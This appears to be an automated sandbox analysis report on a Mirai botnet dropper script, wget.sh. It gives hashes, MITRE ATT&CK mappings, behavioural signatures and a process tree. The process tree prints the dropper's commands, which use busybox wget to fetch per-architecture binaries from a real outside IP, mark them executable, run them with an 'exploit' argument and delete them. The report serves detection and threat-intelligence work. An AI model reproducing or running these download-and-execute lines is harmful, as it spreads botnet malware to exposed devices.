mirai | 51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a

Analysis

max time kernel
145s
max time network
152s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
07/03/2025, 00:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wget.sh
Size

1KB
MD5

a9f753da46e0678e9652f1417378e79a
SHA1

19bf100cae7a6a8fa9a42d0368ff1918c9b796ac
SHA256

51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a
SHA512

3969653a243f80154bbca0045c35e3e8e0b47fdc85bcc13c8887c24e2c207dfd92e3265393ea7d8a28347c67d69501a0d7a2aa2247e116a0705d33731bdce636

Score

10^/10

mirai botnet botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (171173) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 12 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1501	busybox
1511	busybox
1516	busybox
1526	busybox
1531	busybox
1485	busybox
1496	busybox
1506	busybox
1521	busybox
1537	busybox
1480	busybox
1490	busybox

Executes dropped EXE 11 IoCs

ioc	pid	Process
/tmp/jklarm	1481	wget.sh
/tmp/jklarm5	1486	wget.sh
/tmp/jklarm6	1491	wget.sh
/tmp/jklarm7	1497	wget.sh
/tmp/jklm68k	1502	wget.sh
/tmp/jklmips	1507	wget.sh
/tmp/jklmpsl	1512	wget.sh
/tmp/jklppc	1517	wget.sh
/tmp/jklsh4	1522	wget.sh
/tmp/jklspc	1527	wget.sh
/tmp/jklx86	1532	wget.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	wget.sh
File opened for modification	/dev/misc/watchdog	wget.sh

Renames itself 1 IoCs

pid	Process
1532	wget.sh

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	152.53.15.127

Enumerates active TCP sockets 1 TTPs 1 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	wget.sh

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	gnome-shell	1532	wget.sh

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	wget.sh

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/156/comm	wget.sh
File opened for reading	/proc/328/comm	wget.sh
File opened for reading	/proc/1022/status	wget.sh
File opened for reading	/proc/1043/status	wget.sh
File opened for reading	/proc/409/comm	wget.sh
File opened for reading	/proc/457/comm	wget.sh
File opened for reading	/proc/1221/comm	wget.sh
File opened for reading	/proc/1112/status	wget.sh
File opened for reading	/proc/32/comm	wget.sh
File opened for reading	/proc/448/comm	wget.sh
File opened for reading	/proc/1022/comm	wget.sh
File opened for reading	/proc/1221/status	wget.sh
File opened for reading	/proc/1317/comm	wget.sh
File opened for reading	/proc/36/comm	wget.sh
File opened for reading	/proc/429/comm	wget.sh
File opened for reading	/proc/1104/comm	wget.sh
File opened for reading	/proc/1148/comm	wget.sh
File opened for reading	/proc/1336/status	wget.sh
File opened for reading	/proc/34/comm	wget.sh
File opened for reading	/proc/167/comm	wget.sh
File opened for reading	/proc/563/comm	wget.sh
File opened for reading	/proc/1460/comm	wget.sh
File opened for reading	/proc/590/status	wget.sh
File opened for reading	/proc/1070/comm	wget.sh
File opened for reading	/proc/563/status	wget.sh
File opened for reading	/proc/934/status	wget.sh
File opened for reading	/proc/1070/status	wget.sh
File opened for reading	/proc/1355/status	wget.sh
File opened for reading	/proc/4/comm	wget.sh
File opened for reading	/proc/79/comm	wget.sh
File opened for reading	/proc/253/comm	wget.sh
File opened for reading	/proc/1130/comm	wget.sh
File opened for reading	/proc/409/status	wget.sh
File opened for reading	/proc/429/status	wget.sh
File opened for reading	/proc/666/status	wget.sh
File opened for reading	/proc/81/comm	wget.sh
File opened for reading	/proc/993/comm	wget.sh
File opened for reading	/proc/266/status	wget.sh
File opened for reading	/proc/5/comm	wget.sh
File opened for reading	/proc/18/comm	wget.sh
File opened for reading	/proc/26/comm	wget.sh
File opened for reading	/proc/1136/comm	wget.sh
File opened for reading	/proc/1164/comm	wget.sh
File opened for reading	/proc/3/comm	wget.sh
File opened for reading	/proc/1162/comm	wget.sh
File opened for reading	/proc/1166/comm	wget.sh
File opened for reading	/proc/253/status	wget.sh
File opened for reading	/proc/331/status	wget.sh
File opened for reading	/proc/154/comm	wget.sh
File opened for reading	/proc/12/comm	wget.sh
File opened for reading	/proc/469/comm	wget.sh
File opened for reading	/proc/506/comm	wget.sh
File opened for reading	/proc/85/comm	wget.sh
File opened for reading	/proc/29/comm	wget.sh
File opened for reading	/proc/35/comm	wget.sh
File opened for reading	/proc/1317/status	wget.sh
File opened for reading	/proc/27/comm	wget.sh
File opened for reading	/proc/1059/comm	wget.sh
File opened for reading	/proc/1536/status	wget.sh
File opened for reading	/proc/1112/comm	wget.sh
File opened for reading	/proc/1052/comm	wget.sh
File opened for reading	/proc/1276/comm	wget.sh
File opened for reading	/proc/1336/comm	wget.sh
File opened for reading	/proc/462/status	wget.sh

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1505	busybox
1507	jklmips
1509	busybox

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/jklarm	busybox
File opened for modification	/tmp/jklarm5	busybox
File opened for modification	/tmp/jklm68k	busybox
File opened for modification	/tmp/jklmips	busybox
File opened for modification	/tmp/jklppc	busybox
File opened for modification	/tmp/jklsh4	busybox
File opened for modification	/tmp/jklspc	busybox
File opened for modification	/tmp/jklx86	busybox
File opened for modification	/tmp/jklarm6	busybox
File opened for modification	/tmp/jklarm7	busybox
File opened for modification	/tmp/jklmpsl	busybox

/tmp/wget.sh
/tmp/wget.sh
1⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1465
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm -O jklarm
  2⤵
  - Writes file to tmp directory
  PID:1466
- /bin/busybox
  /bin/busybox chmod +x jklarm
  2⤵
  - File and Directory Permissions Modification
  PID:1480
- /tmp/jklarm
  ./jklarm exploit
  2⤵
  PID:1481
- /bin/busybox
  /bin/busybox rm -rf jklarm
  2⤵
  PID:1483
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm5
  2⤵
  - Writes file to tmp directory
  PID:1484
- /bin/busybox
  /bin/busybox chmod +x jklarm5
  2⤵
  - File and Directory Permissions Modification
  PID:1485
- /tmp/jklarm5
  ./jklarm5 exploit
  2⤵
  PID:1486
- /bin/busybox
  /bin/busybox rm -rf jklarm5
  2⤵
  PID:1488
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm6
  2⤵
  - Writes file to tmp directory
  PID:1489
- /bin/busybox
  /bin/busybox chmod +x jklarm6
  2⤵
  - File and Directory Permissions Modification
  PID:1490
- /tmp/jklarm6
  ./jklarm6 exploit
  2⤵
  PID:1491
- /bin/busybox
  /bin/busybox rm -rf jklarm6
  2⤵
  PID:1493
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm7
  2⤵
  - Writes file to tmp directory
  PID:1494
- /bin/busybox
  /bin/busybox chmod +x jklarm7
  2⤵
  - File and Directory Permissions Modification
  PID:1496
- /tmp/jklarm7
  ./jklarm7 exploit
  2⤵
  PID:1497
- /bin/busybox
  /bin/busybox rm -rf jklarm7
  2⤵
  PID:1499
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k
  2⤵
  - Writes file to tmp directory
  PID:1500
- /bin/busybox
  /bin/busybox chmod +x jklm68k
  2⤵
  - File and Directory Permissions Modification
  PID:1501
- /tmp/jklm68k
  ./jklm68k exploit
  2⤵
  PID:1502
- /bin/busybox
  /bin/busybox rm -rf jklm68k
  2⤵
  PID:1504
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklmips -O jklmips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1505
- /bin/busybox
  /bin/busybox chmod +x jklmips
  2⤵
  - File and Directory Permissions Modification
  PID:1506
- /tmp/jklmips
  ./jklmips exploit
  2⤵
  - System Network Configuration Discovery
  PID:1507
- /bin/busybox
  /bin/busybox rm -rf jklmips
  2⤵
  - System Network Configuration Discovery
  PID:1509
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklmpsl -O jklmpsl
  2⤵
  - Writes file to tmp directory
  PID:1510
- /bin/busybox
  /bin/busybox chmod +x jklmpsl
  2⤵
  - File and Directory Permissions Modification
  PID:1511
- /tmp/jklmpsl
  ./jklmpsl exploit
  2⤵
  PID:1512
- /bin/busybox
  /bin/busybox rm -rf jklmpsl
  2⤵
  PID:1514
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklppc -O jklppc
  2⤵
  - Writes file to tmp directory
  PID:1515
- /bin/busybox
  /bin/busybox chmod +x jklppc
  2⤵
  - File and Directory Permissions Modification
  PID:1516
- /tmp/jklppc
  ./jklppc exploit
  2⤵
  PID:1517
- /bin/busybox
  /bin/busybox rm -rf jklppc
  2⤵
  PID:1519
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklsh4 -O jklsh4
  2⤵
  - Writes file to tmp directory
  PID:1520
- /bin/busybox
  /bin/busybox chmod +x jklsh4
  2⤵
  - File and Directory Permissions Modification
  PID:1521
- /tmp/jklsh4
  ./jklsh4 exploit
  2⤵
  PID:1522
- /bin/busybox
  /bin/busybox rm -rf jklsh4
  2⤵
  PID:1524
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklspc -O jklspc
  2⤵
  - Writes file to tmp directory
  PID:1525
- /bin/busybox
  /bin/busybox chmod +x jklspc
  2⤵
  - File and Directory Permissions Modification
  PID:1526
- /tmp/jklspc
  ./jklspc exploit
  2⤵
  PID:1527
- /bin/busybox
  /bin/busybox rm -rf jklspc
  2⤵
  PID:1529
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklx86 -O jklx86
  2⤵
  - Writes file to tmp directory
  PID:1530
- /bin/busybox
  /bin/busybox chmod +x jklx86
  2⤵
  - File and Directory Permissions Modification
  PID:1531
- /bin/busybox
  /bin/busybox rm -rf jklx86
  2⤵
  PID:1534
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarc -O jklarc
  2⤵
  PID:1536
- /bin/busybox
  /bin/busybox chmod +x jklarc
  2⤵
  - File and Directory Permissions Modification
  PID:1537
- /tmp/jklarc
  ./jklarc exploit
  2⤵
  PID:1538
- /bin/busybox
  /bin/busybox rm -rf jklarc
  2⤵
  PID:1539
- /bin/busybox
  /bin/busybox rm -rf wget.sh
  2⤵
  PID:1540

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/jklarm

Filesize
55KB

MD5
a2e0300a38d49740dd9af7820f2e2b6b

SHA1
82fc641a38383412bb88dd5cdb83d45a8315daa5

SHA256
fc96aa360ca3f3318444f338f9131a9a43c00beb3e812e639cfe80f07219c9a7

SHA512
cc4906d1088a9191ade954aa1637ade08e6e7278bb4b541a0af0549bb876b3adcb7ba5cc94acf3e455d1e65e5f6afce36b1556129b95a53392aae72112f3bfa6

Download Submit
/tmp/jklarm5

Filesize
55KB

MD5
6808c976ae3e0456efb6e6fc4e1a8423

SHA1
d9b7a61a16aa0e2875b04ff7eac22e72fc15a24e

SHA256
270336c1d58b1ffaa8ebba18d47d73c2451fa149194f37cc44e980ac96cf1443

SHA512
8b890a0f2d216b8041577412b2d7d4f9524caf0d185f45d48ce7df781fce05e0148e3f767dfc6bb76931a9237e6a26b80decae63a7685760727a8b9716855917

Download Submit
/tmp/jklarm6

Filesize
65KB

MD5
2c56a6803c9b541e037c5501da6def2f

SHA1
5b5787622aa43f619ecd49c1659f769f9bb812cc

SHA256
906399d69e39253d0551c6bf9c59451b2ee12e5e7e8ac557040b38c6b813e711

SHA512
b799bea5f2a69cf97abe1a5b6acb64f4488430a06555ae511a2e0f2e8177ae4c021560914544fd8fbb4a1490f7a686cee8be78c1bd2830305b8d780f79a8e109

Download Submit
/tmp/jklarm7

Filesize
78KB

MD5
99154e7a3a17fd455bc0131558ac9ca5

SHA1
e05cb68fb3ef86f8ed9b33464447931c976d19d2

SHA256
494100c806fe62f35ed5c3be8beff7469d490f0ab1f0bb7e48cff5ee2338c704

SHA512
9312a49e34448c583541993b9778fa033abeddb62588b6e609c71e4a2db6af64dc0bc886cde06e391997fb40deaa65ee89133ccf718ec273e8c00dc629c46273

Download Submit
/tmp/jklm68k

Filesize
56KB

MD5
91dc53f1e1c3e4dca61214c5aac4b95f

SHA1
33de1d50d02ef6f0942a6102531acf76baedc9d0

SHA256
50f4f9c94f0a96aead95a0ca2866a99bda3d3f9d8c2360a02bd993dfc37c5f2a

SHA512
17e9e15d031e3a784dcb5a132d8303b6764b07f68e953aae42f0d94b95adcee3321c85002d6c25ead6f12261e226b8947b651feaff52c58dce55e3a7a845b5c9

Download Submit
/tmp/jklmips

Filesize
74KB

MD5
da5f082847104367fefde63653084863

SHA1
63a45455eb18ea7f6f5d1b374bd1cb18781c6a86

SHA256
6fc1f441c08b49ceb3083fa2a201d424c5282ec7a5cd2431bd017490ba2b23de

SHA512
2c406081e2a226af6dbe06370224d14dca11f73b7532069ca028027816eb61122b6b49e9ec672c041cf362792aa1e23ca9e29dbe8c580e8838a6f7d2c2edffa6

Download Submit
/tmp/jklmpsl

Filesize
74KB

MD5
eb8e5a5d4d7a332bf23f7cc07c05389f

SHA1
dd9291fec1c6905ba48fdf18462a0a350e82d36a

SHA256
0ee587fea341d9da43777102b508c6017d29ad537594afa596e042d4ecd67cf8

SHA512
c5aa6c4e4c4218b21d2f0cf7cdab53f7b21c8f615db7bcf1f11f9aed5e0efc57d09abfcdf6205fa16808c7af0ada585c357c7f6913bfeda02737411f8a1dbcec

Download Submit
/tmp/jklppc

Filesize
54KB

MD5
2b4cf97b280d52022bca7412cd3e88ce

SHA1
c980732704ca918a436a9157ac176f59b7750700

SHA256
b825d7abc8614fc03e79be548c6ef93dd9f759e6713e2b4a7a7f596edf43aeb8

SHA512
b41497c3ff903262410caa2c7f85fb165308ba4edcd5fb2cd60fa3ae1d1d4298ca7437ad40e65bd56efb711ad0eb3d549b914c8c2301e5d44a0f2fe762c1363b

Download Submit
/tmp/jklsh4

Filesize
50KB

MD5
3036c5d81ab1803280ac6720f3db46fc

SHA1
fec661f4177be27c9f2e4d88a14eb298649cd59e

SHA256
ba7faa58d615bd5f4ebaaf7f42b7fe484639b7a0a96217c541b592837899d4e7

SHA512
7ab20c93c8ccbd2abf21262f1c26db38844f7f4826f8e9a0e0fbff054dad8addd28b990dba78602073a629c7c95e099ca0806bbf49bb3a90735da918521c002b

Download Submit
/tmp/jklspc

Filesize
58KB

MD5
3265cd7853c5c1dcff6d7f601f376c00

SHA1
56c7c08c2d71c1ada224c2be71c7010e0a7f7917

SHA256
4b7e002022269bff7334ec6174d91723412db36b319cc970e3e3707ac433b3ba

SHA512
0c804da08f2b99eac2a7dea87a2a8f212e0c4aec28b1684df125037b9393ca9f171d7190bce9f7cfc18f5c20beefb1c9deb8aa692043909fc3fa4a18c9b7a46a

Download Submit
/tmp/jklx86

Filesize
49KB

MD5
84597b4e86a02818478e8e9ef7c74485

SHA1
80d83dea146a0fc48a5154c87d19bbefd3a1c26b

SHA256
28bb529e99c8730de533d64995979a491d6af643ddcd99997788ff945dc6b426

SHA512
02d3c182c9b10bc5a21a0459599d86b4254307e11e35e77e140c82dd97b86ed180c73c5068fd4706e6f7d2896b167521f5cbc67a89d457a1aaf77770180ae08f

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads